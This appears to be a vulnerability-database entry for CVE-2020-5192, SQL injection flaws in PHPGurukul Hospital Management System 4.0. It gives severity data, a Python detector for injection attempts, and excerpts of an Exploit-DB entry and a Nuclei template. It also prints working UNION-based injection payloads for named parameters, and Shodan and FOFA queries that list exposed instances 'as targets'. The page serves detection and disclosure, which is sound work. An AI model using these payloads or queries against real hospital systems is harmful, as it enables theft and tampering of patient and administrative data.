CVE-2020-5192
Published 2020-01-06
Priority P2 · 64 · high · 8.8 · CVSS 3.1
AV:N · AC:L · PR:L · UI:N · S:U · C:H · I:H · A:H
EXPLOIT
EPSS: 16.81% (96.7th percentile)
PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple SQL injection vulnerabilities: multiple pages and parameters are not validating user input, and allow for the application's database and information to be fully compromised.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpgurukul | hospital_management_system | — | — |
Detection & IOCs (extracted from sources)
command: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search=
command: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp
command: searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=
- Detect UNION-based SQL injection attempts in POST parameter 'searchdata' on /doctor/search.php — look for UNION ALL SELECT with NULL columns and CONCAT payloads
- Detect boolean-based and time-based blind SQLi in GET parameter 'viewid' on /doctor/view-patient.php — payloads include AND SLEEP(5) and AND <int>=<int>
- Detect time-based blind SQLi in POST parameter 'bs' — payload contains AND SLEEP(5) injected into medical history submission
- Detect boolean-based and time-based blind SQLi in POST parameter 'cpass' on /admin/change-password.php — payloads include AND SLEEP(5) and AND <int>=<int>#
- Use Shodan/FOFA to identify exposed Hospital Management System instances as targets: shodan-query 'http.html:"hospital management system"', fofa-query 'body="hospital management system"'
- Nuclei template detection: POST to /hospital/hms/doctor/search.php with UNION payload and match md5 hash of a known number in the response body confirms exploitation
- All five vulnerable endpoints require authenticated sessions (doctor or admin login); exploitation is post-authentication (PR:L in CVSS)
- The exploit was tested against a local instance at IP 10.0.0.214; the path prefix '/hospital/hospital/hms/' may vary depending on deployment configuration
- Back-end DBMS confirmed as MySQL >= 5.0.0 (MariaDB fork); injection techniques and payloads are MySQL-specific (e.g., SLEEP, NULL-based UNION)
- Web stack at time of testing was Apache 2.4.41 and PHP 7.4.1; detections tied to this stack may need adjustment for other environments
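
The parameter checks listed above, written as a log-side detector in Python (an added example, not code from this page or its sources). The sample requests are constructed, the function name `inspect_request` is hypothetical, and matching on a path suffix and watching `bs` on any path are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter -> path suffix from the notes above. Suffix matching is used because
# the deployment prefix varies; 'bs' has no path on the page, so it is watched
# on every path (assumption).
WATCHED = {
    "searchdata": "/doctor/search.php",
    "viewid": "/doctor/view-patient.php",
    "cpass": "/admin/change-password.php",
    "bs": "",
}

# One pattern per technique named in the notes; \s+ tolerates extra whitespace.
RULES = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("time-blind", re.compile(r"\b(?:and|or)\b.*?\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("boolean-blind", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
]

def inspect_request(method, url, body=""):
    """Return (parameter, rule) pairs for one request to a watched endpoint."""
    parts = urlsplit(url)
    # parse_qsl undoes both %XX and '+' encoding, so the raw and the
    # '+'-separated forms of the same payload normalise to one string.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        pairs += parse_qsl(body, keep_blank_values=True)
    findings = []
    for name, value in pairs:
        suffix = WATCHED.get(name)
        if suffix is None or not parts.path.endswith(suffix):
            continue
        findings += [(name, rule) for rule, rx in RULES if rx.search(value)]
    return findings

# Constructed sample requests (method, URL, form body); not captured traffic.
SAMPLES = [
    ("POST", "/hospital/hms/doctor/search.php", "searchdata='+UNION+ALL+SELECT+NULL,NULL--+x&search="),
    ("GET", "/hospital/hospital/hms/doctor/view-patient.php?viewid=6'%20AND%20SLEEP(5)--%20x", ""),
    ("POST", "/hms/admin/change-password.php", "cpass=x'+AND+4=4%23"),
    ("POST", "/hospital/hms/doctor/search.php", "searchdata=Union+Street+clinic&search="),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, urlsplit(url).path, inspect_request(method, url, body))
```

Three of the four watched parameters arrive in POST bodies, which default web server access logs do not record, so this needs a source that captures form bodies, such as a WAF or reverse-proxy log.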
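CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |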
No detection rules found.
Exploit-DB
Hospital Management System 4.0 - 'searchdata' SQL Injection
exploitdb · 2020-01-02 · CVSS 8.8
CVE-2020-5192 [HIGH] Hospital Management System 4.0 - 'searchdata' SQL Injection
---
# Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection
# Google Dork: N/A
# Date: 2020-01-02
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Tested on: Windows
# CVE : CVE-2020-5192
# The Hospital Management System 4.0 web application is vulnerable to
# SQL injection in multiple areas, listed below are 5 of the prominent
# and easy to exploit areas.
================================ 1 - SQLi ================================
POST /hospital/hospital/hms/doctor/search.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.
Nuclei
Hospital Management System 4.0 - SQL Injection
nuclei · CVSS 8.8
CVE-2020-5192 [HIGH] Hospital Management System 4.0 - SQL Injection
Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
Template:
id: CVE-2020-5192
info:
  name: Hospital Management System 4.0 - SQL Injection
  author: TenBird
  severity: high
  description: |
    Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of t
No writeups or analysis indexed.
Published: 2020-01-06